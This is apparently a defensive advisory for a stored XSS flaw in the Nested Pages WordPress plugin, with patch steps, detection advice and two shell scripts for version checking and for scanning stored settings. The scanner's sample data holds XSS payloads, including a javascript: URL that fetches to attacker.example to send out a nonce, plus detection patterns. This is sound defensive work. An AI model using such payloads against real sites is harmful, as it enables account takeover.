CVE-2025-0718
📋 TL;DR
The Nested Pages WordPress plugin before version 3.2.13 does not properly sanitise and escape some of its settings, leaving a stored cross-site scripting (XSS) flaw. Saving those settings requires the manage_options capability, so the attacker is a high-privilege user such as an administrator, not a contributor. What makes the bug notable is that the script is stored even when the account lacks the unfiltered_html capability, which is the situation of site administrators on a multisite network, where that capability is reserved for super admins. The stored script then executes in the browser of anyone who later views the page on which the setting is rendered.
💻 Affected Systems
- WordPress Nested Pages plugin, all versions before 3.2.13 (the fix is in the plugin; WordPress core is not affected)
📦 What is this software?
Nested Pages, by Kyle Phillips (kylephillips on wordpress.org): an admin-side plugin that replaces the flat page list with a drag-and-drop tree for ordering and nesting pages.
⚠️ Risk & Real-World Impact
Worst Case
On a multisite network, a malicious or compromised site administrator (who lacks unfiltered_html) stores a script in the plugin settings; when a super admin views the affected page, the script runs in that session and can create network accounts, change network settings or redirect the victim, which amounts to a takeover of the whole network. WordPress auth cookies are HttpOnly, so the script acts through the victim's browser using the nonces present in the page rather than by exfiltrating the cookie.
Likely Case
Privilege escalation from site administrator to super admin on multisite, or persistence after an administrator account has been phished or its session stolen: the payload sits in wp_options and fires every time a privileged user opens the page. On a single-site install the attacker already holds administrator rights, so the XSS adds little beyond stealth.
If Mitigated
Once the plugin is at 3.2.13 or later the settings are sanitised and escaped and the issue is closed. Browsers no longer ship built-in XSS filters, so do not count on them; keeping the number of administrators small, requiring two-factor authentication for them and auditing settings changes reduce both the chance of injection and the time a stored payload survives.
🎯 Exploit Status
Exploitation requires an account that can save the plugin's settings, in practice an administrator; there is no unauthenticated or low-privilege path. Given that access the attack is trivial: store a script payload in an unsanitised setting field and wait for another privileged user, typically a multisite super admin, to view the page where it is rendered.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.2.13
Advisory (WPScan): https://wpscan.com/vulnerability/69ddd8eb-33f1-49cf-9428-3d89262b1887/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the Nested Pages plugin.
4. Click 'Update Now' if an update is offered.
5. Alternatively, download version 3.2.13 or later from the WordPress plugin repository and update manually.
🔧 Temporary Workarounds
Temporary plugin deactivation
Disable the Nested Pages plugin until it can be updated; the admin page tree goes away until it is re-enabled, but nothing else on the site changes:
wp plugin deactivate nested-pages
Restrict who can edit the settings
The attacker must be an administrator of the affected site. Removing or restricting the contributor role does not help, because contributors cannot reach the settings page. On a multisite network, review which accounts hold the administrator role on each site, remove any that are not needed and require two-factor authentication for the rest.
🧯 If You Can't Patch
- Keep the set of administrators minimal, require two-factor authentication for them, and on multisite review per-site administrator assignments regularly; the vulnerable settings page is reachable by no one else
- A WordPress security plugin or WAF that inspects POSTed form values for markup (script tags, inline event handlers, javascript: URLs) before they reach wp_options stops the common payloads but not encoded or obfuscated variants; treat it as a stopgap, not a fix
🔍 How to Verify
Check if Vulnerable:
In the WordPress admin, open Plugins > Installed Plugins and read the version shown under Nested Pages; anything below 3.2.13 is vulnerable. The wp-cli command below gives the same answer from a shell.
Check Version:
wp plugin get nested-pages --field=version
Verify Fix Applied:
Confirm plugin version is 3.2.13 or higher in WordPress admin
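The version test above is easy to get wrong when scripted, because a plain string comparison treats 3.10.0 as older than 3.2.13. The following POSIX shell script is an added example, not part of the advisory or of the Nested Pages plugin: it compares dotted versions component by component and, when WP-CLI is available, reads the live version with the same `wp plugin get` command shown above. It assumes WP-CLI is installed and the script is run from the site root as the web user.

```sh
#!/bin/sh
# Added example (not part of the advisory or of the Nested Pages plugin):
# decide whether a Nested Pages version is below the fixed release, 3.2.13.
# Dotted versions are compared component by component as integers, so that
# 3.10.0 is correctly treated as newer than 3.2.13 (a plain string compare
# would get this wrong).
FIXED_VERSION="3.2.13"

# version_lt A B: exit 0 when A < B, 1 otherwise. Non-digit characters in a
# component (e.g. a "-beta" suffix) are ignored; missing components count as 0.
version_lt() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        x="${a%%.*}"; y="${b%%.*}"                             # leading component of each
        if [ "$x" = "$a" ]; then a=""; else a="${a#*.}"; fi    # consume it
        if [ "$y" = "$b" ]; then b=""; else b="${b#*.}"; fi
        x=$(printf '%s' "$x" | tr -cd '0-9'); y=$(printf '%s' "$y" | tr -cd '0-9')
        x="${x:-0}"; y="${y:-0}"
        if [ "$x" -lt "$y" ]; then return 0; fi
        if [ "$x" -gt "$y" ]; then return 1; fi
    done
    return 1   # all components equal
}

# is_vulnerable VERSION: exit 0 if the given plugin version predates the fix.
is_vulnerable() {
    version_lt "$1" "$FIXED_VERSION"
}

# check_installed: read the live version with WP-CLI (run from the site root,
# as the web user) and report. Returns 0 = vulnerable, 1 = patched, 2 = unknown.
check_installed() {
    v=$(wp plugin get nested-pages --field=version 2>/dev/null) || {
        echo "nested-pages not installed, or WP-CLI not usable from here"
        return 2
    }
    if is_vulnerable "$v"; then
        echo "Nested Pages $v is VULNERABLE (fixed in $FIXED_VERSION)"
        return 0
    fi
    echo "Nested Pages $v is patched"
    return 1
}

# Usage: ./check.sh               -> query the installed plugin via WP-CLI
#        ./check.sh 3.2.12 3.10.0 -> classify the given version strings
if [ $# -gt 0 ]; then
    for v in "$@"; do
        if is_vulnerable "$v"; then echo "$v: vulnerable"; else echo "$v: patched"; fi
    done
elif command -v wp >/dev/null 2>&1; then
    check_installed
else
    echo "usage: $0 [VERSION...]  (or run from a WordPress root with WP-CLI installed)"
fi
```

Running it with no arguments on a host with WP-CLI exits 0 when the site is vulnerable, which makes it usable as a fleet-wide check from a configuration-management tool.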
📡 Detection & Monitoring
Log Indicators:
- Writes to the plugin's rows in wp_options (option names with the nestedpages prefix; confirm this on your own install) whose new value contains HTML tags, inline event handlers or javascript: URLs. WordPress core does not log option changes, so this needs an audit-log plugin or database-level auditing.
- Settings changes by a site administrator who lacks unfiltered_html (multisite), or from an administrator session whose IP address or user agent differs from that account's usual pattern (a stolen session)
Network Indicators:
- Requests from administrators' browsers to unfamiliar external hosts right after the plugin's settings page loads (exfiltration of nonces or page content)
SIEM Query:
The field names below are illustrative: WordPress itself emits no such events, so map them to whatever your audit-log plugin forwards.
source="wordpress" AND event="option_updated" AND option_name="nestedpages*" AND (option_value="*<*" OR option_value="*javascript:*" OR option_value="*&lt;*")
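Where no audit log exists, the stored payload can still be found by inspecting the option rows themselves. The following POSIX shell script is an added example, not part of the advisory or of the plugin: it reads tab-separated option_name/option_value rows (the layout `wp db query --skip-column-names` prints) and flags values carrying markup or script-bearing constructs. The nestedpages option-name prefix is an assumption to verify against your wp_options table, the sample rows are constructed, and the live mode assumes WP-CLI run from the site root.

```sh
#!/bin/sh
# Added example (not part of the advisory or of the Nested Pages plugin):
# scan stored plugin settings for the kind of payload a stored-XSS attacker
# leaves behind in wp_options. Input is tab-separated "option_name<TAB>option_value"
# rows, the format `wp db query ... --skip-column-names` emits.

# Constructs worth flagging in a setting that should be plain text: any HTML
# tag, an inline event handler (onerror=, onload=, ...) that is not the tail of
# a longer word, a javascript: URL, and encoded forms of "<" that may be
# decoded before output.
XSS_PATTERN='<[a-zA-Z/!]|(^|[^a-zA-Z])on[a-zA-Z]+[[:space:]]*=|javascript:|&lt;|&#0*60;|\\u003c|%3[cC]'

# scan_options: reads rows on stdin, prints "SUSPECT <name>: <value>" per hit
# (value truncated to 120 chars). Exit 0 if anything was flagged, 1 if clean.
scan_options() {
    hits=$(grep -Ei "$XSS_PATTERN") || return 1
    printf '%s\n' "$hits" | awk -F'\t' '{ printf "SUSPECT %s: %s\n", $1, substr($2, 1, 120) }'
}

# count_suspects: number of flagged rows on stdin, for alert thresholds.
count_suspects() {
    scan_options | awk 'END { print NR }'
}

# sample_rows: constructed test data in wp_options layout (not real site data).
# Option names assume the plugin's "nestedpages" prefix; the last two rows carry
# payloads of the shape a settings XSS would store, the first three are benign.
sample_rows() {
    printf '%s\t%s\n' 'nestedpages_version' '3.2.12'
    printf '%s\t%s\n' 'nestedpages_ui' 'a:1:{s:11:"hide_plugin";s:4:"true";}'
    printf '%s\t%s\n' 'nestedpages_posttypes' 'a:1:{s:4:"page";a:1:{s:8:"position";s:4:"left";}}'
    printf '%s\t%s\n' 'nestedpages_general' 'a:1:{s:11:"button_text";s:42:"<img src=x onerror=alert(document.domain)>";}'
    printf '%s\t%s\n' 'nestedpages_menusync' "s:62:\"javascript:fetch('//attacker.example/?n='+wpApiSettings.nonce)\";"
}

# scan_live: pull the plugin's option rows from the site database with WP-CLI
# and scan them. `wp db prefix` resolves the table prefix (e.g. "wp_").
scan_live() {
    prefix=$(wp db prefix) || return 2
    wp db query "SELECT option_name, option_value FROM ${prefix}options WHERE option_name LIKE 'nestedpages%'" \
        --skip-column-names | scan_options
}

if [ "${1:-}" = "--live" ]; then
    scan_live
else
    echo "Scanning constructed sample rows (use --live on a WordPress host):"
    sample_rows | scan_options || echo "no suspicious settings found"
fi
```

The word-boundary guard in front of `on[a-zA-Z]+=` keeps serialized keys such as "position" or "button_text" from tripping the handler rule; a hit on the `nestedpages_version` row or other plain-text settings should be treated as a real finding, since the plugin never needs markup there.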